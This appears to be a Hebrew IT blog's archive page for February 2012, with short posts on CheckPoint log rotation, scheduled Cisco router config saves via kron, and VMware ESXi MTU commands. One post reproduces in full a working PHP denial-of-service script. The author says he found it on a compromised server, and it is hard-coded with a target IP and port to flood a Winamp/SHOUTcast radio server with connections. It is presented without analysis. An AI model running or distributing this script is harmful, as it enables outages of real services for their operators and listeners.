ארכיון פוסטים מהחודש "פברואר, 2012"

איך להגדיר Log-Rotate ב CheckPoint

יום ראשון, 26 בפברואר, 2012

בברירת המחדל שרתי פיירואל צ'קפוינטק , המערכת מחליפה את קבצי הלוג כאשר הקובץ מגיע לגודל של  של 2Gigabyte

הקבצים נשמרים בספריה על השרת , כדי להיכנס לספריה היכנס לשרת ב SSH ורשום

cd $FWDIR/logs

ניתן לשנות את תדירות ביצוע הLogrotate לצורך כך היכנס ל CheckPoint Smart DashBoard

צור אוביקט מסוג זמן היכנס ל באמצעות Manage-> Time

בנה אופיקט לצורך הדוגמא שם Daily

כאשר Time of Event יהיה כל יום בשעה 05:00

לאחר מכן גש לאוביקט של ה פיירואל לחץ על  Edit על Firewall  או על ה Managment וגש ל Logs and Masters

במסך Log and Masters זה יחסית פשוט הוסף את

Schedule log swtich to:

והכנס את האוביט זמן שבנית,

 

יש שם עוד אפשרויות בהצלחה ,

 

שמירת אוטומטית של הגדרות נתב סיסקו

יום שישי, 24 בפברואר, 2012

נניח שאני רצה לבצע שמירה אוטומטית של הקונפיגורציה בנתב כל יום בשעה קבועה ,

זוהי דוגמא לקונפיגורצה

CCCCCCCC
7600-CAM#conf t
Enter configuration commands, one per line. End with CNTL/Z.
7600-CAM(config)#kron policy-list SaveConfig
7600-CAM(config-kron-policy)#cli write
7600-CAM(config-kron-policy)#exit

7600-CAM(config)#kron occurrence SaveConfigSchedule ?
at Date of kron occurrence eg. 14:30 Feb 13
in Delta time to kron occurrence

7600-CAM(config)#kron occurrence SaveConfigSchedule at ?
hh:mm Time of day for occurrence (hh:min eg. 14:30)

7600-CAM(config)#kron occurrence SaveConfigSchedule at 23:00 ?
<1-31> Day of month
DAY Day of Week eg mon, tue, etc
MONTH Month of year eg jan, feb, etc
oneshot Schedule kron occurrence exactly once
recurring Schedule kron occurrence repeatedly

7600-CAM(config)#kron occurrence SaveConfigSchedule at 23:00 re
7600-CAM(config)#kron occurrence SaveConfigSchedule at 23:00 recurring ?
system-startup Schedule kron occurrence at system start-up
<cr>

7600-CAM(config)#kron occurrence SaveConfigSchedule at 23:00 recurring ?
system-startup Schedule kron occurrence at system start-up
<cr>

7600-CAM(config)#kron occurrence SaveConfigSchedule at 23:00 recurring
Clock currently not set it reads 21:11:05 CAM Mon Oct 24 2011
7600-CAM(config-kron-occurrence)#pol
7600-CAM(config-kron-occurrence)#policy-list SaveConfig
7600-CAM(config-kron-occurrence)#^Z
7600-CAM#wr
Building configuration…
[OK]
7600-CAM#

דוגמא לסקריפט שמבצע DDos על שרתי WinAMP

יום שישי, 24 בפברואר, 2012

זה סקריפט שמצאתי בשרת פרצו ועשו התקפה על שרת רדיו שהיה פעם לאחד החברים שלי

אז שמרתי את הסקריפט שיהיה

<?php
# coded by shir
# Configuration:
####################
$host = '82.166.14.122'; #Remote Host
$port = 8000; # Remote Port
$times = 90000000000000; # Number of connections
$loop = 0; # (0/1) 1 = don't stop connecting, 0 = stop after `$times` connections.
ini_set("max_execution_time",0); # Maximum execution time…
ini_set("default_socket_timeout",0); # Socket Timeout
####################

$sc = 0;
$PrePacket = "GET / HTTP/1.0\r\n";
$PrePacket.= "Host: {$host}\r\n";
$PrePacket.= "User-Agent: WinampMPEG/5.30\r\n";
$PrePacket.= "Accept: */*\r\n";
$PrePacket.= "Icy-MetaData:1\r\n";
$PrePacket.= "Connection: close\r\n\r\n";

do {
for($i = 1; $i <= $times; $i++) {
$sock = @fsockopen($host, $port);
if($sock) {
$sc++;
echo "[~] {$sc}/{$i}\t\t\r";
$alive[$i] = 1;
fputs($sock, $PrePacket);
fclose($sock);
}
}
} while ($loop);
?>

איך לשנות MTU ב VMware

יום שישי, 24 בפברואר, 2012

שרתי VMWare שעובדים ב iSCSI  או דרך NFS

אני ממליץ לשנות את ה MTU – Maximum Tranmission Unit בשרת

ככל שגודל החבילה גדול כך ניתן לקבל קבצי העברת קבצים הרבה יותר גבוהה בכרטיסי 10GigaBit

או 1GigaBithernet

אלו הפקודות עבורEsxi

 

esxcfg-vmknic -l
vmkping -s 9000 192.168.10.2
esxcfg-vswitch -m 1600 vswitch1

esxcfg-vswitch -l